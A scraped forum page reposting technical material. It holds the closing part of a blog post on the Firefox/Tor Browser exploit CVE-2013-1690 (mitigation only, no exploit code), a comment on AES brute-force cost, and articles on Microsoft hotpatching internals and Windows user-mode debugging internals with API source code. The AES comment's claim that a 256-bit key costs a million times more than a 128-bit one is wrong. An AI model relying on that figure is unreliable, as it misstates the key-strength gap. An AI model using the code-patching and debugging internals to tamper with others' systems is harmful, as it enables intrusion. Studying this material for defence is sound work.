120a4040  00040000
120a4044  120a5010

Note: The original exploit does not seem to work against Mozilla Firefox 17 (or other buggy versions) except for the Tor Browser, but you should still get a crash. We figured whoever wrote the exploit didn't really care about regular Firefox users, because apparently they've got nothing to hide.

Metasploit Module

Because of the complexity of the exploit, we've decided to do an initial release for Mozilla Firefox for now. An improved version of the exploit is already on the way, and hopefully we can get that out as soon as possible, so keep an eye on the blog and msfupdate, and stay tuned. Meanwhile, feel free to play FBI in your organization: exercise this exploit on your next social engineering training campaign.

Mitigation

Protecting against this exploit is typically straightforward: all you need to do is upgrade your Firefox browser (or the Tor Browser Bundle, which was the true target of the original exploit).
The vulnerability was patched and released by Mozilla back in late June of 2013, and the TBB was updated a couple of days later, so the world has had a little over a month to get onto the patched versions. Given that, it would appear that the original adversaries here had reason to believe that, at least as of early August 2013, their target pool had not patched. If you're at all familiar with Firefox's normal updates, it's difficult to avoid getting patched; you need to go out of your way to skip updating, and you're more likely than not to screw that up and get patched by accident. However, since the people using Tor services are often relying on read-only media, like a LiveCD or a read-only virtual environment, it's slightly more difficult for them to get timely updates. Doing so means burning a new LiveCD, or marking their VM as writable to make updates persistent. In short, it looks like we have a case where good security advice (don't save anything on your secret operating system) got turned around into a poor operational security practice, violating the "keep up on security patches" rule. Hopefully, this is a lesson learned. Sursa: https://community.rapid7.com/community/metasploit/blog/2013/08/07/heres-that-fbi-firefox-exploit-for-you-cve-2013-1690
  21. Decryption of the keys? Or do you mean the possibility of brute-forcing 128-bit keys? Here's a simple, concrete example: if the NSA needed 1 million dollars' worth of GPUs/CPUs to quickly crack a 128-bit AES key, then to crack a 256-bit key it would need 1 million * 1 million = 1,000 billion dollars ($1,000,000,000,000).
  22. https://rstforums.com/fisiere/defcon.zip
  23. Microsoft Patching Internals Author: EliCZ

Caveat Emptor

This article was not written to read like a novel. It is a to-the-point technical dump describing the inner workings of Microsoft's cold and hot patching process. The majority of the symbolic names listed below have been derived from NTDLL and NTOSKRNL. Please post any questions you may have directly (for the benefit of others) to this article and the author will gladly respond. The article may be updated in the future to include some of these answers inline. A companion download including examples and appropriate header files is available: MSPatching.zip.

Cold Patching

Replacing functions by replacing their containers - files and sections. The image to patch is "atomically replaced" with an image that contains all code and data contained within the original, plus the fixed functions and redirections to them through embedded hooks. The functions to update are statically hooked, and the hooks transfer execution to the fixed functions in the '.text_CP' or '.text_CO' section of a coldpatch module. This section is followed by the '.DBG_POR' section in situations where the original '.data' section has to be modified. In other cases, the '.text_CP' / '.text_CO' sections are followed by '.data_CP' or '.data_CO'. Overall, there can theoretically be as many _CP / _CO sections as the original image has (.text, .rdata, .data, etc.). The '.DBG_POR' section contains module imports, exports and debug information. The debug information for the coldpatch module usually consists of two entries: the first entry is of CODEVIEW type, the second is RESERVED10. RESERVED10 data contains the coldpatch debug information, which is comprised of the HOTPATCH_DEBUG_HEADER structure followed by the HOTPATCH_DEBUG_DATA structure. HOTPATCH_DEBUG_HEADER.Type has the value DEBUG_SIGNATURE_COLDPATCH.
The contents of HOTPATCH_DEBUG_DATA are used in a process called 'target module validation' when the validation of the original module fails and the hotpatch checks if there is a coldpatch present. The atomic file replacement is realized by filling the SYSTEM_HOTPATCH_CODE_INFORMATION.RenameInfo structure and calling the SYSTEM_HOTPATCH_CODE_INFORMATION.Flags.HOTP_RENAME_FILES sub-function of the ExApplyCodePatch function (SystemHotpatchInformation class of Nt/ZwSetSystemInformation). The HOTP_RENAME_FILES sub-function is not implemented in newer OS versions/builds. Replacing the image on a volume doesn't mean that all newly created processes will load/contain the updated image: for system purposes, security, or to increase module loading speed, sections can be employed in the image-loading process. The section for a system module (ntdll.dll, ...) is updated by the HOTP_UPDATE_SYSDLL sub-function (no structure required). The section for the loader (from the \KnownDlls object directory) is updated by calling HOTP_UPDATE_KNOWNDLL with the AtomicSwap sub-structure filled in. The old object's name is swapped with a newly created temporary object (update.exe names the section 'ColdPatchInstallationInProgres') in the object directory.

Hot Patching

Replacing functions by replacing their code in memory. Available since Server 2003 SP0 and XP SP2 (x86, ia64, x64). The functions were successfully fixed on the volume; now they should be changed in memory - in kernel memory for kernel modules, or in the memory of user processes that contain the module to update. The functions to patch are dynamically hooked - one sufficiently long CPU instruction or datum (pointer, RVA) of the function to fix is replaced with a branch instruction (pointer, RVA) that redirects the execution flow to a fixed function in the hotpatch module.
After applying the hooks, the patched module in memory looks like the coldpatch module, except that the targets of the branch instructions do not lie within a '.text_CP' section but in the code section(s) of the hotpatch module. The hotpatch module may contain debug information similar to the coldpatch's, except that its RESERVED10 data consists of the HOTPATCH_DEBUG_HEADER only, and HOTPATCH_DEBUG_HEADER.Type has the value DEBUG_SIGNATURE_HOTPATCH. The hotpatch module must contain a section named '.hotp1 ' that is at least 80 bytes (sizeof(HOTPATCH_HEADER)) long and that must begin with a HOTPATCH_HEADER structure. The structure is used for validating the target module, fixing relocations and creating the intermediate RTL_PATCH_HEADER structure. When applying the hotpatch to a user module, an updating agent enumerates the processes and creates remote threads in them that execute ntdll.LdrHotPatchRoutine. Newer OS versions/builds allow the remote thread creation from kernel mode when the HOTP_INJECT_THREAD sub-function is called and the InjectInfo sub-structure is correctly filled in. LdrHotPatchRoutine checks that the HOTP_USE_MODULE flag is set and that the target module, whose base name is specified in UserModeInfo.TargetNameOffset, is present in the process. When applying the hotpatch to a kernel module (ntoskrnl.MmHotPatchRoutine), both the HOTP_USE_MODULE and HOTP_KERNEL_MODULE flags must be set and the KernelInfo sub-structure must be filled in. The source (hotpatch) module is loaded and checked for the presence of the '.hotp1 ' section, HOTPATCH_HEADER.Signature and Version. If an RTL_PATCH_HEADER for the source module already exists, the hooks were successfully applied and the HOTP_PATCH_APPLY flag is clear, the hooks are removed. Otherwise an RTL_PATCH_HEADER is created, and the target module, whose name is in HOTPATCH_HEADER.TargetNameRva, is checked for presence and validated according to ModuleIdMethod using TargetModuleIdValue.
If there's a validation mismatch, the system checks whether the target module is the coldpatch, according to the coldpatch debug info. If it is the coldpatch, the PATCHFLAG_COLDPATCH_VALID flag is set in RTL_PATCH_HEADER.PatchFlags. The functions to fix may access the target image; they can call its functions and use its variables (meaning pointers and call/jump targets do not have to be in the hotpatch module, because they point directly into the target module). Such code must be fixed using special relocation fixups from HOTPATCH_HEADER.FixupRgnRva, with respect to HOTPATCH_HEADER.OrigHotpBaseAddress and HOTPATCH_HEADER.OrigTargetBaseAddress. The fixed functions then behave as if they were called from the original module. The number of HOTPATCH_FIXUP_ENTRY structures in a HOTPATCH_FIXUP_REGION must be even. If the hotpatch contains standard base relocations, they usually apply only to pointers to the hotpatch's import table (APIs). Various places of the target module can be validated according to the HOTPATCH_VALIDATION structures in HOTPATCH_HEADER.ValidationArrayRva. Validations with the option HOTP_Valid_Hook_Target are skipped (those are the places to patch). HOTPATCH_HOOK_DESCRIPTOR structures are prepared according to the HOTPATCH_HOOK structures in HOTPATCH_HEADER.HookArrayRva. The first 5 bits of HOTPATCH_HOOK.HookOptions contain the length of the instruction to replace, which must be at least as long as the branch instruction - for some hook types, the rest is padded with bytes of value 0xCC. Again, it is possible to validate the bytes that will be replaced (HOTP_Valid_Hook_Target now has no effect). If there's a mismatch and the patch place already contains the adequate branch instruction, the list of RTL_PATCH_HEADER structures in TargetModule.LDR_DATA_TABLE_ENTRY.PatchInformation is traversed and the bytes at HOTPATCH_HOOK_DESCRIPTOR.CodeOffset are compared with the prepared branch instruction.
If there's a mismatch and the target module is the coldpatch, the validation succeeds for some hook types; for the other ones, it is checked whether the branch instruction points into the coldpatch. Upon successful validation and hook preparation, the remaining members of RTL_PATCH_HEADER are filled in, the sections of the target module are made writable, and the hooks are written by calling ExApplyCodePatch with RTL_PATCH_HEADER.CodeInfo and the HOTP_PATCH flag set. If the patch application succeeds, the RTL_PATCH_HEADER is linked into the TargetModule.LDR_DATA_TABLE_ENTRY.PatchInformation list. There's no security issue: Debug and LoadDriver privileges must be enabled for all Cold/HotPatch operations except for user-mode hotpatching or when applying CodeInfo directly. CodeInfo cannot be directly applied to the kernel when calling ExApplyCodePatch from user mode. CodeInfo is applied "os-atomically" - preemption is unlikely. The function to fix doesn't have to be compiled/linked with the /hotpatch (/functionpadmin) option. There's no public tool (a special version of the C compiler or linker?) for creating the cold/hotpatches. It is possible to write a tool that adds/writes the '.hotp1 ' section to an image created by normal compiling/linking, but there are two problems: how to write the new function with instructions pointing into the target module, and the fixup handling conjoined with this. Then again, one doesn't have to use the target module's functions/data, so there's no need for the hotpatch fixups.
Hook Types

HOTP_Hook_None
HOTP_Hook_VA32 - 32-bit value/pointer, 4 bytes
HOTP_Hook_X86_JMP - x86/64 long relative jump, E9 Rel32, <-2GB..2GB-1>, Rel32 constructed according to Hook/HotpRva, >= 5 bytes, padded with 0xCC
HOTP_Hook_PCREL32 - not yet implemented, for fixing the Rel32 of an x86/64 call or jump, 4 bytes
HOTP_Hook_X86_JMP2B - x86/64 short relative jump, EB Rel8, <-128B..127B>, Rel8 is in HotpRva, >= 2 bytes, padded with 0xCC
HOTP_Hook_VA64 - 64-bit value/pointer, 8 bytes
HOTP_Hook_IA64_BRL - ia64 branch; at HookRva there must be a supported template type, >= 16 bytes
HOTP_Hook_IA64_BR - not yet implemented
HOTP_Hook_AMD64_IND - x86/64 absolute indirect jump, FF 25 [Offset32 / Rip+Rel32]; HotpRva (+Rip) must point to a variable that contains a pointer to the fixed function, >= 6 bytes, padded with 0xCC
HOTP_Hook_AMD64_CNT - 16-bit value/pointer, 2 bytes

Hook combinations are allowed - HOTP_Hook_X86_JMP2B + HOTP_Hook_X86_JMP is typical. When the hotpatch-target distance exceeds 2GB, HOTP_Hook_AMD64_IND must be employed on x86/64. One then needs a place to store the pointer specified in [Offset32 / Rip+Rel32]. For x86 it can be inside the hotpatch module, but for x64 it cannot; HOTP_Hook_AMD64_IND + HOTP_Hook_VA64 is the solution. The /hotpatch option for x64 is not yet implemented, but I would suggest:

Buffer:                                        ; for HOTP_Hook_VA64
8x nop
FnStart:
48 8D A4 24 00 00 00 00   lea rsp, [rsp + 0]   ; 2 bytes more than required
or
0F 8x 00 00 00 00         j?? $+6              ; as long as required but slower

In Coldpatch/After Hotpatching it could look like:

Buffer:
Ptr64 FnContinue
FnStart:
FF 25 F2 FF FF FF         jmp qword ptr [Buffer]   ; [Rip-14]
CC CC

Of course, it is also possible to make a triple patch: JMP2B -> IND -> VA64.

x86 Patch Examples

A function created with /hotpatch, a "semi-hotpatchable" function, and a "non-hotpatchable" function. You may notice that more than one CPU instruction is replaced (the 5x nop together with a long relative jmp), but the nops are not involved in the function - they serve as a buffer.
1) Function created with /hotpatch:

   Original Function:
   5x 90             5x nop
   FnStart:
   8B FF             mov edi, edi
   55                push ebp
   8B EC             mov ebp, esp
   56                push esi
   57                push edi
   8B 35 g_Data      mov esi, g_Data

   ColdPatch/After HotPatching:
   E9 Rel32          jmp FnContinue
   FnStart:
   EB F9             jmp $-5
   55                push ebp
   8B EC             mov ebp, esp
   56                push esi
   57                push edi
   8B 35 g_Data      mov esi, g_Data

   In Cold/HotPatch:
   FnStart:
   FnContinue:
   55                push ebp
   8B EC             mov ebp, esp
   56                push esi
   57                push edi
   8B 35 g_Data      mov esi, g_Data   ; fixup required

2) "Semi-hotpatchable" function:

   Original Function:
   5x 90             5x nop
   FnStart:
   55                push ebp
   8B EC             mov ebp, esp
   56                push esi
   57                push edi
   8B 35 g_Data      mov esi, g_Data

   ColdPatch/After HotPatching:
   E9 Rel32          jmp FnContinue
   FnStart:
   55                push ebp
   EB F8             jmp $-6
   56                push esi
   57                push edi
   8B 35 g_Data      mov esi, g_Data

   In Cold/HotPatch:
   FnStart:
   55                push ebp
   FnContinue:
   8B EC             mov ebp, esp
   56                push esi
   57                push edi
   8B 35 g_Data      mov esi, g_Data   ; fixup required

3) "Non-hotpatchable" function:

   Original Function:
   FnStart:
   55                push ebp
   8B EC             mov ebp, esp
   56                push esi
   57                push edi
   8B 35 g_Data      mov esi, g_Data

   ColdPatch/After HotPatching:
   FnStart:
   55                push ebp
   8B EC             mov ebp, esp
   56                push esi
   57                push edi
   E9 Rel32          jmp FnContinue
   CC                int 3

   In Cold/HotPatch:
   FnStart:
   55                push ebp
   8B EC             mov ebp, esp
   56                push esi
   57                push edi
   FnContinue:
   8B 35 g_Data      mov esi, g_Data   ; fixup required

References
- Inside Update.exe - Windows Server | Deploy, Manage, Troubleshoot
- KB packages for Server2003 x86 that contain the cold/hotpatches: 819696, 823182, 888113, 893086, 899588, 901190

Sursa: OpenRCE
  24. Windows User Mode Debugging Internals Author: AlexIonescu

Introduction

The internal mechanisms of what allows user-mode debugging to work have rarely ever been fully explained. Even worse, these mechanisms have radically changed in Windows XP, when much of the support was re-written, as well as made more subsystem-portable, by including most of the routines in ntdll as part of the Native API. This three-part series will explain this functionality, starting from the Win32 (kernel32) viewpoint all the way down (or up) to the NT kernel (ntoskrnl) component responsible for this support, called Dbgk, while making a stop at the NT System Library (ntdll) and its DbgUi component. The reader is expected to have some basic knowledge of C and general NT kernel architecture and semantics. Also, this is not an introduction to what debugging is or how to write a debugger. It is meant as a reference for experienced debugger writers, or curious security experts.

Win32 Debugging

The Win32 subsystem of NT has allowed the debugging of processes ever since the first release, with later releases adding more features and debugging help libraries, related to symbols and other PE information. However, relatively few things have changed for the outside API user, except for the welcome addition of the ability to stop debugging a process without killing it, which was added in Windows XP. This release of NT also contained several overhauls of the underlying implementation, which will be discussed in detail. However, one important side-effect of these changes was that LPC (and csrss.exe) were not used anymore, which made debugging of this binary possible (previously, debugging this binary was impossible, since it was the one responsible for handling the kernel-to-user notifications).
The basic Win32 APIs for dealing with debugging a process were simple: DebugActiveProcess, to attach; WaitForDebugEvent, to wait for debug events to come through so that your debugger can handle them; and ContinueDebugEvent, to resume thread execution. The release of Windows XP added three more useful APIs: DebugActiveProcessStop, which allows you to stop debugging a process (detach); DebugSetProcessKillOnExit, which allows you to continue running a process even after it's been detached; and DebugBreakProcess, which allows you to perform a remote DebugBreak without having to manually create a remote thread. In Windows XP Service Pack 1, one more API was added: CheckRemoteDebuggerPresent. Much like its IsDebuggerPresent counterpart, this API allows you to check for a connected debugger in another process, without having to read the PEB remotely. Because of NT's architecture, these APIs, on recent versions of Windows (2003 will be used as an example, but the information applies to XP as well), do not do much work themselves. Instead, they do the typical job of calling the required native functions and then processing the output so that the Win32 caller can have it in a format that is compatible with Win9x and the original Win32 API definition.
Let's look at these very simple implementations:

BOOL
WINAPI
DebugActiveProcess(IN DWORD dwProcessId)
{
    NTSTATUS Status;
    HANDLE Handle;

    /* Connect to the debugger */
    Status = DbgUiConnectToDbg();
    if (!NT_SUCCESS(Status))
    {
        SetLastErrorByStatus(Status);
        return FALSE;
    }

    /* Get the process handle */
    Handle = ProcessIdToHandle(dwProcessId);
    if (!Handle) return FALSE;

    /* Now debug the process */
    Status = DbgUiDebugActiveProcess(Handle);
    NtClose(Handle);

    /* Check if debugging worked */
    if (!NT_SUCCESS(Status))
    {
        /* Fail */
        SetLastErrorByStatus(Status);
        return FALSE;
    }

    /* Success */
    return TRUE;
}

As you can see, the only work that's being done here is to create the initial connection to the user-mode debugging component, which is done through the DbgUi Native API set, located in ntdll, which we'll see later. Because DbgUi uses handles instead of PIDs, the PID must first be converted with a simple helper function:

HANDLE
WINAPI
ProcessIdToHandle(IN DWORD dwProcessId)
{
    NTSTATUS Status;
    OBJECT_ATTRIBUTES ObjectAttributes;
    HANDLE Handle;
    CLIENT_ID ClientId;

    /* If we don't have a PID, look it up */
    if (dwProcessId == -1) dwProcessId = (DWORD)CsrGetProcessId();

    /* Open a handle to the process */
    ClientId.UniqueProcess = (HANDLE)dwProcessId;
    InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
    Status = NtOpenProcess(&Handle,
                           PROCESS_ALL_ACCESS,
                           &ObjectAttributes,
                           &ClientId);
    if (!NT_SUCCESS(Status))
    {
        /* Fail */
        SetLastErrorByStatus(Status);
        return 0;
    }

    /* Return the handle */
    return Handle;
}

If you are not familiar with the Native API, it is sufficient to say that this code is the simple equivalent of an OpenProcess on the PID, so that a handle can be obtained. Going back to DebugActiveProcess, the final call which does the work is DbgUiDebugActiveProcess, which is again located in the Native API. After the connection is made, we can close the handle that we had obtained from the PID previously. Other APIs function much in the same way.
Let's take a look at two of the newer XP ones:

BOOL
WINAPI
DebugBreakProcess(IN HANDLE Process)
{
    NTSTATUS Status;

    /* Send the breakin request */
    Status = DbgUiIssueRemoteBreakin(Process);
    if (!NT_SUCCESS(Status))
    {
        /* Failure */
        SetLastErrorByStatus(Status);
        return FALSE;
    }

    /* Success */
    return TRUE;
}

BOOL
WINAPI
DebugSetProcessKillOnExit(IN BOOL KillOnExit)
{
    HANDLE Handle;
    NTSTATUS Status;
    ULONG State;

    /* Get the debug object */
    Handle = DbgUiGetThreadDebugObject();
    if (!Handle)
    {
        /* Fail */
        SetLastErrorByStatus(STATUS_INVALID_HANDLE);
        return FALSE;
    }

    /* Now set the kill-on-exit state */
    State = KillOnExit;
    Status = NtSetInformationDebugObject(Handle,
                                         DebugObjectKillProcessOnExitInformation,
                                         &State,
                                         sizeof(State),
                                         NULL);
    if (!NT_SUCCESS(Status))
    {
        /* Fail */
        SetLastError(Status);
        return FALSE;
    }

    /* Success */
    return TRUE;
}

The first hopefully requires no explanation, as it's a simple wrapper, but let's take a look at the second. If you're familiar with the Native API, you'll instantly recognize the familiar NtSetInformationXxx type of API, which is used for setting various settings on the different types of NT objects, such as files, processes, threads, etc. The interesting thing to note here, which is new to XP, is that debugging itself is also now done with a Debug Object. The specifics of this object will be discussed later. For now, let's look at the function. The first API, DbgUiGetThreadDebugObject, is another call to DbgUi, which will return a handle to the Debug Object associated with our thread (we'll see where this is stored later). Once we have the handle, we call a Native API which directly communicates with Dbgk (and not DbgUi), and which will simply change a flag in the kernel's Debug Object structure. This flag, as we'll see, will be read by the kernel when detaching.
A similar function to this one is CheckRemoteDebuggerPresent, which uses the same type of NT semantics to obtain information about the process:

BOOL
WINAPI
CheckRemoteDebuggerPresent(IN HANDLE hProcess,
                           OUT PBOOL pbDebuggerPresent)
{
    HANDLE DebugPort;
    NTSTATUS Status;

    /* Make sure we have an output and process */
    if (!(pbDebuggerPresent) || !(hProcess))
    {
        /* Fail */
        SetLastError(ERROR_INVALID_PARAMETER);
        return FALSE;
    }

    /* Check if the process has a debug object/port */
    Status = NtQueryInformationProcess(hProcess,
                                       ProcessDebugPort,
                                       (PVOID)&DebugPort,
                                       sizeof(HANDLE),
                                       NULL);
    if (NT_SUCCESS(Status))
    {
        /* Return the current state */
        *pbDebuggerPresent = (DebugPort) ? TRUE : FALSE;
        return TRUE;
    }

    /* Otherwise, fail */
    SetLastErrorByStatus(Status);
    return FALSE;
}

As you can see, another NtQuery/SetInformationXxx API is being used, but this time for the process. Although you probably know that to detect debugging one can simply check NtCurrentPeb()->BeingDebugged, there exists another way to do this, and that is by querying the kernel. Since the kernel needs to communicate with user mode on debugging events, it needs some sort of way of doing this. Before XP, this used to be done through an LPC port, and now through a Debug Object (which shares the same pointer, however). Since it is located in the EPROCESS structure in kernel mode, we do a query using the ProcessDebugPort information class. If EPROCESS->DebugPort is set to something, then this API will return TRUE, which means that the process is being debugged. This trick can also be used for the local process, but it's much faster to simply read the PEB. One can notice that although some applications like to set Peb->BeingDebugged to FALSE to trick anti-debugging programs, there is no way to set DebugPort to NULL, since the kernel itself would then not let you debug (and you also don't have access to kernel structures).
With that in mind, let's see how the gist of the entire Win32 debugging infrastructure, WaitForDebugEvent, is implemented. This needs to be shown before the much simpler ContinueDebugEvent/DebugActiveProcessStop, because it introduces the high-level internal structure that Win32 uses to wrap around DbgUi.

BOOL
WINAPI
WaitForDebugEvent(IN LPDEBUG_EVENT lpDebugEvent,
                  IN DWORD dwMilliseconds)
{
    LARGE_INTEGER WaitTime;
    PLARGE_INTEGER Timeout;
    DBGUI_WAIT_STATE_CHANGE WaitStateChange;
    NTSTATUS Status;

    /* Check if this is an infinite wait */
    if (dwMilliseconds == INFINITE)
    {
        /* Under NT, this means no timer argument */
        Timeout = NULL;
    }
    else
    {
        /* Otherwise, convert the time to NT format */
        WaitTime.QuadPart = UInt32x32To64(-10000, dwMilliseconds);
        Timeout = &WaitTime;
    }

    /* Loop while we keep getting interrupted */
    do
    {
        /* Call the native API */
        Status = DbgUiWaitStateChange(&WaitStateChange, Timeout);
    } while ((Status == STATUS_ALERTED) || (Status == STATUS_USER_APC));

    /* Check if the wait failed */
    if (!(NT_SUCCESS(Status)) || (Status == DBG_UNABLE_TO_PROVIDE_HANDLE))
    {
        /* Set the error code and quit */
        SetLastErrorByStatus(Status);
        return FALSE;
    }

    /* Check if we timed out */
    if (Status == STATUS_TIMEOUT)
    {
        /* Fail with a timeout error */
        SetLastError(ERROR_SEM_TIMEOUT);
        return FALSE;
    }

    /* Convert the structure */
    Status = DbgUiConvertStateChangeStructure(&WaitStateChange, lpDebugEvent);
    if (!NT_SUCCESS(Status))
    {
        /* Set the error code and quit */
        SetLastErrorByStatus(Status);
        return FALSE;
    }

    /* Check what kind of event this was */
    switch (lpDebugEvent->dwDebugEventCode)
    {
        /* New thread was created */
        case CREATE_THREAD_DEBUG_EVENT:

            /* Setup the thread data */
            SaveThreadHandle(lpDebugEvent->dwProcessId,
                             lpDebugEvent->dwThreadId,
                             lpDebugEvent->u.CreateThread.hThread);
            break;

        /* New process was created */
        case CREATE_PROCESS_DEBUG_EVENT:

            /* Setup the process data */
            SaveProcessHandle(lpDebugEvent->dwProcessId,
                              lpDebugEvent->u.CreateProcessInfo.hProcess);

            /* Setup the thread data */
            SaveThreadHandle(lpDebugEvent->dwProcessId,
                             lpDebugEvent->dwThreadId,
                             lpDebugEvent->u.CreateThread.hThread);
            break;

        /* Process was exited */
        case EXIT_PROCESS_DEBUG_EVENT:

            /* Mark the process data as such */
            MarkProcessHandle(lpDebugEvent->dwProcessId);
            break;

        /* Thread was exited */
        case EXIT_THREAD_DEBUG_EVENT:

            /* Mark the thread data */
            MarkThreadHandle(lpDebugEvent->dwThreadId);
            break;

        /* Nothing to do for anything else */
        default:
            break;
    }

    /* Return success */
    return TRUE;
}

First, let's look at the DbgUi APIs present. The first, DbgUiWaitStateChange, is the native version of WaitForDebugEvent, and it's responsible for doing the actual wait on the Debug Object and getting the structure associated with this event. However, DbgUi uses its own internal structures (which we'll show later) so that the kernel can understand them, while Win32 has had much different structures, defined back in the Win9x days. Therefore, one needs to convert this to the Win32 representation, and the DbgUiConvertStateChangeStructure API is what does this conversion, returning the LPDEBUG_EVENT Win32 structure that is backwards-compatible and documented on MSDN. What follows is a switch that is interested in the creation or deletion of a process or thread. Four APIs are used: SaveProcessHandle and SaveThreadHandle, which save these respective handles (remember that a new process must have an associated thread, so the thread handle is saved as well), and MarkProcessHandle and MarkThreadHandle, which flag these handles as being exited. Let's look at this high-level framework in detail.
VOID
WINAPI
SaveProcessHandle(IN DWORD dwProcessId,
                  IN HANDLE hProcess)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Allocate a thread structure */
    ThreadData = RtlAllocateHeap(RtlGetProcessHeap(),
                                 0,
                                 sizeof(DBGSS_THREAD_DATA));
    if (!ThreadData) return;

    /* Fill it out */
    ThreadData->ProcessHandle = hProcess;
    ThreadData->ProcessId = dwProcessId;
    ThreadData->ThreadId = 0;
    ThreadData->ThreadHandle = NULL;
    ThreadData->HandleMarked = FALSE;

    /* Link it */
    ThreadData->Next = DbgSsGetThreadData();
    DbgSsSetThreadData(ThreadData);
}

This function allocates a new structure, DBGSS_THREAD_DATA, and simply fills it out with the process handle and ID that were sent. Finally, it links it to the current DBGSS_THREAD_DATA structure and sets itself as the new current one (thus creating a linked list of DBGSS_THREAD_DATA structures). Let's take a look at this structure:

typedef struct _DBGSS_THREAD_DATA
{
    struct _DBGSS_THREAD_DATA *Next;
    HANDLE ThreadHandle;
    HANDLE ProcessHandle;
    DWORD ProcessId;
    DWORD ThreadId;
    BOOLEAN HandleMarked;
} DBGSS_THREAD_DATA, *PDBGSS_THREAD_DATA;

This generic structure thus allows storing process/thread handles and IDs, as well as the flag we've talked about in regard to MarkProcess/ThreadHandle. We've also seen some DbgSsSet/GetThreadData functions, which will show us where this list of structures is located. Let's look at their implementations:

#define DbgSsSetThreadData(d) \
    NtCurrentTeb()->DbgSsReserved[0] = d

#define DbgSsGetThreadData() \
    ((PDBGSS_THREAD_DATA)NtCurrentTeb()->DbgSsReserved[0])

Easy enough, and now we know what the first element of the mysterious DbgSsReserved array in the TEB is.
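The head-insertion bookkeeping above can be modeled in portable C. Here a plain global stands in for the TEB's DbgSsReserved[0] slot, and the simplified names (ModelThreadData, SaveProcessHandleModel, and so on) are invented for illustration; this is a sketch under those assumptions, not the real kernel32 code.

```c
#include <stdlib.h>
#include <stddef.h>

/* Simplified mirror of DBGSS_THREAD_DATA */
typedef struct ModelThreadData {
    struct ModelThreadData *Next;
    void *ThreadHandle;
    void *ProcessHandle;
    unsigned long ProcessId;
    unsigned long ThreadId;
    int HandleMarked;
} ModelThreadData;

/* Stand-in for NtCurrentTeb()->DbgSsReserved[0] */
static ModelThreadData *DbgSsThreadData;

/* Mirrors SaveProcessHandle: allocate, fill out, link at the head */
static void SaveProcessHandleModel(unsigned long pid, void *hProcess)
{
    ModelThreadData *d = calloc(1, sizeof *d);
    if (!d) return;
    d->ProcessHandle = hProcess;
    d->ProcessId = pid;
    d->Next = DbgSsThreadData;   /* ThreadData->Next = DbgSsGetThreadData() */
    DbgSsThreadData = d;         /* DbgSsSetThreadData(ThreadData)          */
}

/* Mirrors MarkProcessHandle: walk the list, flag the matching entry */
static void MarkProcessHandleModel(unsigned long pid)
{
    for (ModelThreadData *d = DbgSsThreadData; d; d = d->Next)
    {
        if (d->ProcessId == pid && d->ThreadId == 0)
        {
            d->HandleMarked = 1;
            break;
        }
    }
}
```

Note the consequence of head insertion: the entry recorded most recently is always found first when the list is walked.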
Although you can probably guess the SaveThreadHandle implementation yourself, let's look at it for completeness' sake:

VOID
WINAPI
SaveThreadHandle(IN DWORD dwProcessId,
                 IN DWORD dwThreadId,
                 IN HANDLE hThread)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Allocate a thread structure */
    ThreadData = RtlAllocateHeap(RtlGetProcessHeap(),
                                 0,
                                 sizeof(DBGSS_THREAD_DATA));
    if (!ThreadData) return;

    /* Fill it out */
    ThreadData->ThreadHandle = hThread;
    ThreadData->ProcessId = dwProcessId;
    ThreadData->ThreadId = dwThreadId;
    ThreadData->ProcessHandle = NULL;
    ThreadData->HandleMarked = FALSE;

    /* Link it */
    ThreadData->Next = DbgSsGetThreadData();
    DbgSsSetThreadData(ThreadData);
}

As expected, nothing new here. The MarkThread/Process functions are just as straightforward:

VOID
WINAPI
MarkThreadHandle(IN DWORD dwThreadId)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Loop all thread data events */
    ThreadData = DbgSsGetThreadData();
    while (ThreadData)
    {
        /* Check if this one matches */
        if (ThreadData->ThreadId == dwThreadId)
        {
            /* Mark the structure and break out */
            ThreadData->HandleMarked = TRUE;
            break;
        }

        /* Move to the next one */
        ThreadData = ThreadData->Next;
    }
}

VOID
WINAPI
MarkProcessHandle(IN DWORD dwProcessId)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Loop all thread data events */
    ThreadData = DbgSsGetThreadData();
    while (ThreadData)
    {
        /* Check if this one matches */
        if (ThreadData->ProcessId == dwProcessId)
        {
            /* Make sure the thread ID is empty */
            if (!ThreadData->ThreadId)
            {
                /* Mark the structure and break out */
                ThreadData->HandleMarked = TRUE;
                break;
            }
        }

        /* Move to the next one */
        ThreadData = ThreadData->Next;
    }
}

Notice that the only less-than-trivial implementation detail is that the list needs to be walked in order to find the matching process or thread ID. Now that we've taken a look at these structures, let's see the associated ContinueDebugEvent API, which picks up after a WaitForDebugEvent call in order to resume the thread.
BOOL
WINAPI
ContinueDebugEvent(IN DWORD dwProcessId,
                   IN DWORD dwThreadId,
                   IN DWORD dwContinueStatus)
{
    CLIENT_ID ClientId;
    NTSTATUS Status;

    /* Set the Client ID */
    ClientId.UniqueProcess = (HANDLE)dwProcessId;
    ClientId.UniqueThread = (HANDLE)dwThreadId;

    /* Continue debugging */
    Status = DbgUiContinue(&ClientId, dwContinueStatus);
    if (!NT_SUCCESS(Status))
    {
        /* Fail */
        SetLastErrorByStatus(Status);
        return FALSE;
    }

    /* Remove the process/thread handles */
    RemoveHandles(dwProcessId, dwThreadId);

    /* Success */
    return TRUE;
}

Again, we're dealing with a DbgUi API, DbgUiContinue, which is going to do all the work for us. Our only job is to call RemoveHandles, which is part of the high-level structures that wrap DbgUi. This function is slightly more complex than what we've seen, because we're given PIDs/TIDs, so we need to do some lookups:

VOID
WINAPI
RemoveHandles(IN DWORD dwProcessId,
              IN DWORD dwThreadId)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Loop all thread data events */
    ThreadData = DbgSsGetThreadData();
    while (ThreadData)
    {
        /* Check if this one matches */
        if (ThreadData->ProcessId == dwProcessId)
        {
            /* Make sure the thread ID matches too */
            if (ThreadData->ThreadId == dwThreadId)
            {
                /* Check if we have a thread handle */
                if (ThreadData->ThreadHandle)
                {
                    /* Close it */
                    CloseHandle(ThreadData->ThreadHandle);
                }

                /* Check if we have a process handle */
                if (ThreadData->ProcessHandle)
                {
                    /* Close it */
                    CloseHandle(ThreadData->ProcessHandle);
                }

                /* Unlink the thread data */
                DbgSsSetThreadData(ThreadData->Next);

                /* Free it */
                RtlFreeHeap(RtlGetProcessHeap(), 0, ThreadData);

                /* Move to the next structure */
                ThreadData = DbgSsGetThreadData();
                continue;
            }
        }

        /* Move to the next one */
        ThreadData = ThreadData->Next;
    }
}

